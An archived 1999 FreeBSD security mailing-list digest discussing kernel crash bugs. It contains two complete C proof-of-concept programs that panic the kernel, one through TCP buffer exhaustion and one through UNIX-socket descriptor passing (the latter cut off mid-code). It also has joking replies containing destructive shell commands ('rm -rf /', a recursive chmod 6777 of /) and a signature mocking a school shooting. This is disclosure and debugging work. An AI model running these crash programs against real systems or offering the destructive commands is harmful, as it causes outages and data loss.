Its another to > have it done under controlled conditions and neither get an explanantion > OR trap the condition that caused it yourself with a tcpdump trace. > > -- > -- > Karl Denninger (karl@denninger.net) Web: fathers.denninger.net > I ain't even *authorized* to speak for anyone other than myself, so give > up now on trying to associate my words with any particular organization. -- jamie rishaw "Ammo, 200 rounds: $75. Semi-Automatic Rifle: $675. Ski-Mask: $10. Kenneth Cole Trench Coat: $400. Look on classmate's face just before you blow his brains out: Priceless. .. In the Colorado school system, you can risk losing your life, but they don't take any card from American Express. Visa -- it's everywhere you want to be." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 16:16: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 9DE1B14E77 for ; Wed, 5 May 1999 16:16:03 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id QAA22419; Wed, 5 May 1999 16:16:00 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id QAA25795; Wed, 5 May 1999 16:15:59 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id QAA10024; Wed, 5 May 1999 16:15:57 -0700 (PDT) From: Don Lewis Message-Id: <199905052315.QAA10024@salsa.gv.tsc.tdk.com> Date: Wed, 5 May 1999 16:15:57 -0700 In-Reply-To: The Tech-Admin Dude "Re: freebsd mbuf crash" (May 5, 12:35am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: The Tech-Admin Dude , Don Lewis Subject: Re: freebsd mbuf crash Cc: 
freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 5, 12:35am, The Tech-Admin Dude wrote: } Subject: Re: freebsd mbuf crash } Raise NMBCLUSTERS in kernel config file That's the fix for FreeBSD panics caused by running out of mbuf clusters. The exploit code that was posted triggered a bug in the IP reassembly code that was present in 3.0 between August and October last year (ip_input.c versions 1.100 through 1.102). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 16:25:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id EA77F152F2 for ; Wed, 5 May 1999 16:25:48 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id RAA11629; Wed, 5 May 1999 17:25:47 -0600 (MDT) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.1/8.9.1) id RAA05598; Wed, 5 May 1999 17:25:46 -0600 (MDT) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Wed, 5 May 1999 17:25:46 -0600 (MDT) From: "David G. 
Andersen" To: Don Lewis Cc: The Tech-Admin Dude , freebsd-security@FreeBSD.ORG, bugtraq@netspace.org Subject: Re: freebsd mbuf crash In-Reply-To: Don Lewis's message of Wed, May 5 1999 <199905052315.QAA10024@salsa.gv.tsc.tdk.com> References: <199905052315.QAA10024@salsa.gv.tsc.tdk.com> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14128.53675.396459.783894@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There's another fairly easy way to exploit this on pre-3.0 systems, as an aside, but it requires either a fairly slow server process (or one which you can force to block), or local access. The process is simple: connect send a big chunk of data which causes the TCP socket buffers to fill up before the remote process read()s it panic(). I was going to send out a note about this, but since it's fixed in 3.0ish systems, never bothered. But while we're on the topic, there you go. The bug was actually pointed out in an indirect way by the author of a paper at sigcomm, who noticed the phenomenon in NetBSD while they were rewriting the buffer management routines. I just wrote a small test program for it, and found they were right. It also seems to affect IRIX systems, resulting in a hung system. Test program (for local users) is at the end of this message. It creates a socket, listen()s on it, and does nothing. The other process connects to this socket, and sends a bunch of junk. I tested it against an early, early version of 3.0-current, and it appeared to be fixed. Linux and AIX proved happy with it. Never got around to trying it on a Solaris box. CC:'d to bugtraq, since it does affect IRIX too. -Dave Lo and Behold, Don Lewis said: > On May 5, 12:35am, The Tech-Admin Dude wrote: > } Subject: Re: freebsd mbuf crash > } Raise NMBCLUSTERS in kernel config file > > That's the fix for FreeBSD panics caused by running out of mbuf clusters. 
>
> The exploit code that was posted triggered a bug in the IP reassembly code
> that was present in 3.0 between August and October last year (ip_input.c
> versions 1.100 through 1.102).
>

-- 
work: danderse@cs.utah.edu me: angio@pobox.com
University of Utah http://www.angio.net/
Computer Science - Flux Research Group "What's footnote FIVE?"

/* Test program for TCP buffer overflow mbuf panic */
/* Dave Andersen - danderse@cs.utah.edu */
/* netbuf.c - gcc netbuf.c -o netbuf */

/* The header names were lost in the archive; these are the standard
 * headers the calls below need (socket/bind/listen/setsockopt,
 * sockaddr_in/htonl/htons, fork/sleep/write, bzero, printf/perror). */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <strings.h>
#include <unistd.h>

#define MAXSOCK 500
#define MY_BUFSIZE 32768
#define MAGICPORT 29833

#ifndef INADDR_LOOPBACK
#define INADDR_LOOPBACK 0x7f000001
#endif

/*
 * Compiling:
 *   FreeBSD, AIX: -DHAS_SIN_LEN
 *   Linux, IRIX:
 */

/*
 * Vulnerable:
 *   FreeBSD-2.x
 *   IRIX
 * Not vulnerable:
 *   FreeBSD-3.0
 *   Linux 2.0.30
 *   AIX 4.1
 */

struct sockaddr_in socka;

/* Listener that never accept()s or read()s: every connection stays queued
 * and everything sent to it piles up in kernel socket buffers. */
void doecho()
{
    int ls;

    ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    bind(ls, (struct sockaddr *)&socka, sizeof(socka));
    listen(ls, MAXSOCK);
    while (1) {
        sleep(1);
    }
}

int main(int argc, char **argv)
{
    int kidpid;
    int sendsock[MAXSOCK], recvsock[MAXSOCK];
    int i;
    int sock;
    int socksize;
    char buf[MY_BUFSIZE];

    socksize = 1048576;

    bzero(&socka, sizeof(socka));
    socka.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
#ifdef HAS_SIN_LEN
    socka.sin_len = sizeof(struct sockaddr_in);
#endif
    socka.sin_family = AF_INET;
    socka.sin_port = htons(MAGICPORT);

    kidpid = fork();
    if (kidpid > 0) {
        doecho();
    } else {
        /* A vague, horrible excuse for synchronization.  This
         * is a demonstration of a kernel flaw, not good coding
         * style. :-) */
        sleep(2);
    }

    for (i = 0; i < MAXSOCK; i++) {
        /* Open the socket connection, set the socket option */
        sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        setsockopt(sock, SOL_SOCKET, SO_SNDBUF, &socksize, sizeof(socksize));
        sendsock[i] = sock;
        if (connect(sock, (struct sockaddr *)&socka, sizeof(socka))) {
            perror("could not connect");
        }
        printf("Opened\n");
    }

    printf("Starting the loop\n");
    while (1) {
        for (i = 0; i < MAXSOCK; i++)
            write(sendsock[i], buf, MY_BUFSIZE);
    }
}

From owner-freebsd-security Wed May 5 16:47:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id C47D614F81 for ; Wed, 5 May 1999 16:47:39 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id QAA22856; Wed, 5 May 1999 16:47:36 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id QAA26024; Wed, 5 May 1999 16:47:35 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id QAA10103; Wed, 5 May 1999 16:47:34 -0700 (PDT) From: Don Lewis Message-Id: <199905052347.QAA10103@salsa.gv.tsc.tdk.com> Date: Wed, 5 May 1999 16:47:34 -0700 In-Reply-To: Don Lewis "Re: freebsd mbuf crash" (May 5, 4:15pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Don Lewis , The Tech-Admin Dude Subject: Re: freebsd mbuf crash Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On May 5, 4:15pm, Don Lewis wrote:
} Subject: Re: freebsd mbuf crash
} On May 5, 12:35am, The Tech-Admin Dude wrote:
} } Subject: Re: freebsd mbuf crash
} } Raise NMBCLUSTERS in kernel config file
} }
} That's the fix for FreeBSD panics caused by running out of mbuf clusters.
}
} The exploit code that was posted triggered a bug in the IP reassembly code
} that was present in 3.0 between August and October last year (ip_input.c
} versions 1.100 through 1.102).

I retract this statement. At first I thought the code was the nestea2 exploit from late last year, but I now believe it is a different exploit.

Its use of a large number of IP options and fragmented TCP packets makes it resemble a potential way of sneaking TCP packets through a packet filtering firewall that filters by port numbers, by overlaying the fragments so that the desired port number in the second fragment overwrites the port number in the first fragment that the firewall allowed through (but FreeBSD's IP reassembly algorithm never allowed FreeBSD to be attacked in this manner as an end system, so far as I know). This isn't what the code is trying to exploit, though. It's probably something related to fragment reassembly, IP option processing, or the sending of TCP RSTs in response to unsolicited packets.
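The overlay Don Lewis describes is what a filter or reassembler can refuse outright: a later fragment must never rewrite bytes of the datagram that already arrived, and the first fragment must carry the whole TCP header the filter decides on (the rules RFC 1858 recommends). The checker below is an added example for this archive, not code from the thread or from FreeBSD's ip_input.c; the fragment descriptors and the sequences in main() are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_DGRAM   65535u   /* largest IPv4 datagram */
#define TCP_MIN_HDR 20u      /* bytes 0..19: ports, seq, ack, flags */

/* One fragment as a filter sees it (constructed, not parsed from a capture):
 * byte offset into the datagram, payload length, More Fragments flag. */
struct frag {
    unsigned offset;
    unsigned len;
    bool     more;
};

enum frag_verdict {
    FRAG_OK,            /* sequence reassembles without any rewrite */
    FRAG_BAD_LENGTH,    /* zero length or runs past the 64 KiB limit */
    FRAG_TINY_FIRST,    /* first fragment too short to carry the TCP header */
    FRAG_HDR_REWRITE,   /* a later fragment overlays transport-header bytes */
    FRAG_OVERLAP        /* a later fragment overlays payload already seen */
};

/* Derive a descriptor from raw IPv4 header fields in host byte order:
 * total length, IHL (32-bit words) and the flags/fragment-offset word. */
struct frag frag_from_header(unsigned total_len, unsigned ihl, unsigned flags_off)
{
    struct frag f;
    unsigned hlen = ihl * 4u;
    f.offset = (flags_off & 0x1fffu) * 8u;   /* low 13 bits, 8-byte units */
    f.len    = total_len > hlen ? total_len - hlen : 0;
    f.more   = (flags_off & 0x2000u) != 0;   /* MF flag */
    return f;
}

/* Replay the fragments in arrival order over a byte map of the datagram.
 * Returns the first non-OK verdict and stores the offending index in
 * *bad_idx (n when the sequence is clean). A host reassembler keeps either
 * the old or the new bytes on overlap; this check rejects any overlap at
 * all, so an overlay aimed at a permissive host is still reported. */
enum frag_verdict check_fragments(const struct frag *f, size_t n, size_t *bad_idx)
{
    static unsigned char seen[MAX_DGRAM];
    memset(seen, 0, sizeof seen);
    for (size_t i = 0; i < n; i++) {
        unsigned off = f[i].offset, len = f[i].len;
        if (len == 0 || off > MAX_DGRAM || len > MAX_DGRAM - off) {
            *bad_idx = i;
            return FRAG_BAD_LENGTH;
        }
        /* A first fragment without the whole TCP header leaves the filter
         * unable to see every field it decides on. */
        if (off == 0 && f[i].more && len < TCP_MIN_HDR) {
            *bad_idx = i;
            return FRAG_TINY_FIRST;
        }
        for (unsigned b = off; b < off + len; b++) {
            if (seen[b]) {
                *bad_idx = i;
                return b < TCP_MIN_HDR ? FRAG_HDR_REWRITE : FRAG_OVERLAP;
            }
        }
        memset(seen + off, 1, len);
    }
    *bad_idx = n;
    return FRAG_OK;
}

const char *frag_verdict_name(enum frag_verdict v)
{
    static const char *names[] = {
        "ok", "bad-length", "tiny-first-fragment",
        "transport-header-rewrite", "payload-overlap"
    };
    return names[v];
}

int main(void)
{
    size_t idx;
    /* Constructed: an ordinary 1980-byte TCP segment split at a 1500 MTU. */
    struct frag benign[] = { {0, 1480, true}, {1480, 500, false} };
    /* Constructed: the overlay from the thread, a second fragment at
     * offset 0 that replaces the port numbers the filter already approved. */
    struct frag overlay[] = { {0, 24, true}, {0, 24, false} };

    printf("benign : %s\n", frag_verdict_name(check_fragments(benign, 2, &idx)));
    printf("overlay: %s (fragment %zu)\n",
           frag_verdict_name(check_fragments(overlay, 2, &idx)), idx);
    return 0;
}
```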
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 18:52:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id B4D86158DC for ; Wed, 5 May 1999 18:52:14 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id SAA22112; Wed, 5 May 1999 18:51:34 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id SAA11030; Wed, 5 May 1999 18:51:35 -0700 Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA23421; Wed, 5 May 99 18:51:32 PDT Message-Id: <3730F5A4.D3BE532B@softweyr.com> Date: Wed, 05 May 1999 19:51:32 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Jamie Rishaw Cc: security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> <19990503225131.I10291@holly.dyndns.org> <19990503231813.A11570@Denninger.Net> <19990505174832.A41704@rage.arpa.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jamie Rishaw wrote: > > Actually, I'm not on any fbsd mail lists, and I'm in the process > of moving from Chicago to LA. This is the first time I've been on > my mail in quite a while. (Days). > > I'll get a tcpdump some time when I can get someone to reset a > box, but it's not exactly on my list of priorities to have production > boxen of mine rebooted mid-stream. Thank you. Any help you can give, tcpdump, kernel stack backtrace, or a core file will help. 
> I'm perhaps the biggest fbsd proponent in my company.. I did not
> intend to slander or annoy anyone, rather, to get people out trying
> to figure out what the exploit is, and get to work.

As we have learned. The speculation about your motives was unnecessary.

> --
> jamie rishaw
> "Ammo, 200 rounds: $75. Semi-Automatic Rifle: $675. Ski-Mask: $10. Kenneth Cole
> Trench Coat: $400. Look on classmate's face just before you blow his brains
> out: Priceless. .. In the Colorado school system, you can risk losing your
> life, but they don't take any card from American Express. Visa -- it's
> everywhere you want to be."

Is this in any way related to my .sig? ;^)

-- 
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
http://www.softweyr.com/~softweyr                       wes@softweyr.com

From owner-freebsd-security Thu May  6 03:01:05 1999
From: Papezik Milon
Date: Thu, 06 May 1999 12:01:18 +0200
To: "David G. Andersen"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: freebsd mbuf crash
Message-ID: <3731686E.977E324A@pvt.net>
References: <199905052315.QAA10024@salsa.gv.tsc.tdk.com> <14128.53675.396459.783894@torrey.cs.utah.edu>

"David G. Andersen" wrote:
>
> CC:'d to bugtraq, since it does affect IRIX too.

I've tried your example code on an IRIX 6.5(.3) machine but it survived
without problem. Which version of IRIX has been affected? What is the
expected effect?

Thanks in advance,
Milon Papezik
-- 
papezik@pvt.net

From owner-freebsd-security Thu May  6 07:22:47 1999
From: Cy Schubert
Reply-To: Cy Schubert - ITSD Open Systems Group
Date: Thu, 06 May 1999 07:21:54 -0700
To: Deepwell Internet
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
In-reply-to: Your message of "Fri, 30 Apr 1999 10:34:16 PDT." <4.1.19990430103009.012536c0@mail1.dcomm.net>
Message-Id: <199905061422.HAA41839@passer.osg.gov.bc.ca>

You are correct; however, a better approach would be "rm -rf /", as it
would take less time to complete and it would remove any possibility of
users filling your disk. You would also have the added benefit of having a
system that would be almost impossible to break into.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Open Systems Group          Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                   Cy.Schubert@gems8.gov.bc.ca
Province of BC
            "Take Leykis 101, for gods's sake."

In message <4.1.19990430103009.012536c0@mail1.dcomm.net>, Deepwell Internet writes:
> I prefer all my files, executables and data to be SUID root. I'm even
> including a small script to aid in this. Good luck!
>
> #!/bin/sh
> cd /
> chown -R root:wheel /
> chmod -R 6777 /
> echo 'done'
>
> At 10:05 AM 4/30/99 -0700, you wrote:
> >In message >pm.es>, "Pedro J. Lobo" writes:
> >> Hello, people.
> >>
> >> I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and
> >> telnet server for our students. Recently I noticed that several users were
> >> using more disk space than their quotas should allow (!). After a bit of
> >> investigation, I have traced down the problem to the mail system.
> >>
> >> The problem is that you can send mail to a user that is over quota, and
> >> the system will append the new message to its inbox (located in /var/mail,
> >> as by default). Indeed, root can append data to a file that belongs to a
> >> user that is over quota.
> >>
> >> As you may see, it is a rather ugly "feature". So, the question is: does
> >> /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> >> use /usr/bin/mail as the local mailer? I also administer an alpha with
> >> Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> >> mailer.
> >
> >The main difference between DU and FreeBSD is:
> >
> >DU 4.0D:
> >OSF1 hostname V4.0 878 alpha
> >drwxrwxrwt   2 root  mail      512 Apr 26 00:00 /var/spool/mail
> >lrwxrwxrwx   1 root  system      7 Dec  9 14:16 /bin -> usr/bin
> >-rws--x--x   2 root  bin     40960 Dec 29  1997 /usr/bin/mail
> >
> >FreeBSD 3.1R:
> >FreeBSD hostname 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Thu Apr  8 16:05:54 PDT 1999 root@hostname:/opt/usr_src-310/sys/compile/HOSTNAME i386
> >drwxrwxr-x   2 root  mail      512 Apr 30 09:41 /var/mail
> >-r-sr-xr-x   1 root  wheel   15056 Mar  2 06:53 /usr/libexec/mail.local
> >
> >Solaris 2.6 (for good measure):
> >SunOS HOSTNAME 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-Enterprise
> >drwxrwxrwt   3 root  mail      512 Apr 29 23:45 /var/mail
> >-r-x--s--x   1 bin   mail    64376 Jul 15  1997 /bin/mail
> >
> >You can resolve your issue by making mail.local sgid mail instead
> >of suid root. Ownership of individual mail files cannot be set by
> >mail.local when it's sgid mail, so you will need to create each
> >individual user's mail spool file with the proper permissions 660
> >and ownership before they can receive mail. If mail.local is the
> >only sgid mail application on your system, using sgid mail
> >shouldn't be any less secure (from a privacy point of view) than
> >the stock-out-of-the-box setup.
> >
> >Regards,                       Phone:  (250)387-8437
> >Cy Schubert                      Fax:  (250)387-5766
> >Open Systems Group          Internet:  Cy.Schubert@uumail.gov.bc.ca
> >ITSD                                   Cy.Schubert@gems8.gov.bc.ca
> >Province of BC
> >            "e**(i*pi)+1=0"

From owner-freebsd-security Thu May  6 11:38:15 1999
From: sthaug@nethelp.no
Date: Thu, 06 May 1999 20:38:00 +0200
To: security@freebsd.org
Subject: Forward: KKIS.05051999.003b
Message-ID: <13867.926015880@verdi.nethelp.no>

Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from
14. april.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

---------- Forwarded message ----------
Date: Wed, 5 May 1999 11:26:21 +0200
From: Lukasz Luzar
Reply-To: Lukasz Luzar
Sender: Bugtraq List
To: BUGTRAQ@NETSPACE.ORG
Subject: KKIS.05051999.003b
Approved-By: aleph1@UNDERGROUND.ORG

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      ###  ###  ###  ###  ###
      ###  ###  ###  ###  ###
      ######    ######    ###
      ###  ###  ###  ###  ###
      ###  ###  ###  ###  ###

                            S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      KKI Security Team                   Cracow Commercial Internet
      http://www.security.kki.pl          http://www.kki.pl
      mailto:security@security.kki.pl     mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   Report title      : Security problem with sockets in FreeBSD's
                       implementation of UNIX-domain protocol family.
   Problem found by  : Lukasz Luzar (lluzar@security.kki.pl)
   Report created by : Robert Pajak (shadow@security.kki.pl)
                       Lukasz Luzar (lluzar@security.kki.pl)
   Report published  : 5th May 1999
   Report code       : KKIS.05051999.003.b
   Systems affected  : FreeBSD-3.0 and maybe 3.1
   Archive           : http://www.security.kki.pl/advisories/
   Risk level        : high

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   As you know, "The UNIX-domain protocol family is a collection of protocols
   that provides local interprocess communication through the normal socket
   mechanism. It supports the SOCK_STREAM and SOCK_DGRAM socket types and uses
   filesystem pathnames for addressing."
   The SOCK_STREAM sockets also support the communication of UNIX file
   descriptors through the use of the functions sendmsg() and recvmsg().
   While testing UNIX-domain protocols, we have found a probable bug in
   FreeBSD's implementation of this mechanism.
   When we ran the attached example on FreeBSD-3.0 as a local user, the
   system crashed immediately with the error "Supervisor read, page not
   present" in kernel mode.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   Look at the attached example.
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   Copyright (c) 1999 KKI Security Team, Poland
   All rights reserved.

   All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Content-Type: TEXT/PLAIN; charset=US-ASCII; name="example.c"
Content-Transfer-Encoding: BASE64
Content-Disposition: attachment; filename="example.c"

From owner-freebsd-security Thu May  6 12:13:42 1999
From: Jamie Lawrence
Date: Thu, 06 May 1999 12:16:37 -0700
To: security@freebsd.org
Subject: Fwd: KKIS.05051999.003b
Message-Id: <4.1.19990506121618.050a5aa0@mail.thirdage.com>
>Approved-By: aleph1@UNDERGROUND.ORG
>X-Sender: lluzar@nova.kki.krakow.pl
>Date: Wed, 5 May 1999 11:26:21 +0200
>Reply-To: Lukasz Luzar
>Sender: Bugtraq List
>From: Lukasz Luzar
>Subject: KKIS.05051999.003b
>To: BUGTRAQ@netspace.org
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>      ###  ###  ###  ###  ###
>      ###  ###  ###  ###  ###
>      ######    ######    ###
>      ###  ###  ###  ###  ###
>      ###  ###  ###  ###  ###
>
>                            S E C U R I T Y
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>      KKI Security Team                   Cracow Commercial Internet
>      http://www.security.kki.pl          http://www.kki.pl
>      mailto:security@security.kki.pl     mailto:biuro@kki.pl
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>   Report title      : Security problem with sockets in FreeBSD's
>                       implementation of UNIX-domain protocol family.
>   Problem found by  : Lukasz Luzar (lluzar@security.kki.pl)
>   Report created by : Robert Pajak (shadow@security.kki.pl)
>                       Lukasz Luzar (lluzar@security.kki.pl)
>   Report published  : 5th May 1999
>   Report code       : KKIS.05051999.003.b
>   Systems affected  : FreeBSD-3.0 and maybe 3.1
>   Archive           : http://www.security.kki.pl/advisories/
>   Risk level        : high
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>   As you know, "The UNIX-domain protocol family is a collection of protocols
>   that provides local interprocess communication through the normal socket
>   mechanism. It supports the SOCK_STREAM and SOCK_DGRAM socket types and uses
>   filesystem pathnames for addressing."
>   The SOCK_STREAM sockets also support the communication of UNIX file
>   descriptors through the use of the functions sendmsg() and recvmsg().
>   While testing UNIX-domain protocols, we have found a probable bug in
>   FreeBSD's implementation of this mechanism.
>   When we ran the attached example on FreeBSD-3.0 as a local user, the
>   system crashed immediately with the error "Supervisor read, page not
>   present" in kernel mode.
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>   Look at the attached example.
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>   Copyright (c) 1999 KKI Security Team, Poland
>   All rights reserved.
>
>   All questions please address to mailto:security@security.kki.pl
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>

Content-Disposition: attachment; filename="example1.c"

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>

#define PATH      "/tmp/123"
#define PATH_TMP  "/tmp/123.tmp"
#define SOME_FILE "/etc/passwd"

/* Hand-built ancillary data: one cmsghdr followed by one descriptor. */
struct mycmsghdr {
	struct cmsghdr hdr;
	int fd;
};

void server(void);
void client(void);

int main(void)
{
	switch (fork()) {
	case -1:
		printf("fork error %d\n", errno);
		break;
	case 0:
		for (;;) client();
	default:
		server();
	}
	return 0;
}

void server(void)
{
	struct sockaddr_un addr;
	struct msghdr mymsghdr;
	struct mycmsghdr ancdbuf;
	char data[1];
	int sockfd, len, fd;

	if (unlink(PATH) == -1)
		printf("unlink error %d\n", errno);

	if ((sockfd = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1)
		printf("socket error %d\n", errno);

	strcpy(addr.sun_path, PATH);
	addr.sun_len = sizeof(addr.sun_len) + sizeof(addr.sun_family)
		+ strlen(addr.sun_path);
	addr.sun_family = AF_UNIX;

	if (bind(sockfd, (struct sockaddr *) &addr, addr.sun_len) == -1)
		printf("bind error %d\n", errno);

	for (;;) {
		/* Open a fresh descriptor to pass on every datagram received. */
		if ((fd = open(SOME_FILE, O_RDONLY)) == -1)
			printf("open file error %d\n", errno);

		len = sizeof(addr.sun_path);

		if (recvfrom(sockfd, &data, sizeof(data), 0,
			(struct sockaddr *) &addr, &len) == -1)
			printf("recvfrom error %d\n", errno);

		ancdbuf.hdr.cmsg_len = sizeof(ancdbuf);
		ancdbuf.hdr.cmsg_level = SOL_SOCKET;
		ancdbuf.hdr.cmsg_type = SCM_RIGHTS;
		ancdbuf.fd = fd;

		/* Send the descriptor back to whoever sent the datagram. */
		mymsghdr.msg_name = (caddr_t) &addr;
		mymsghdr.msg_namelen = len;
		mymsghdr.msg_iov = NULL;
		mymsghdr.msg_iovlen = 0;
		mymsghdr.msg_control = (caddr_t) &ancdbuf;
		mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
		mymsghdr.msg_flags = 0;

		if (sendmsg(sockfd, &mymsghdr, 0) == -1)
			printf("sendmsg error %d\n", errno);

		close(fd);
	}
}

void client(void)
{
	struct sockaddr_un addr_s, addr_c;
	struct mycmsghdr ancdbuf;
	struct msghdr mymsghdr;
	char data[1];
	int sockfd, len, fd;

	if ((sockfd = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1)
		printf("socket error %d\n", errno);

	if (unlink(PATH_TMP) == -1)
		printf("unlink error %d\n", errno);

	strcpy(addr_c.sun_path, PATH_TMP);
	addr_c.sun_len = sizeof(addr_c.sun_len) + sizeof(addr_c.sun_family)
		+ strlen(addr_c.sun_path);
	addr_c.sun_family = AF_UNIX;

	strcpy(addr_s.sun_path, PATH);
	addr_s.sun_len = sizeof(addr_s.sun_len) + sizeof(addr_s.sun_family)
		+ strlen(addr_s.sun_path);
	addr_s.sun_family = AF_UNIX;

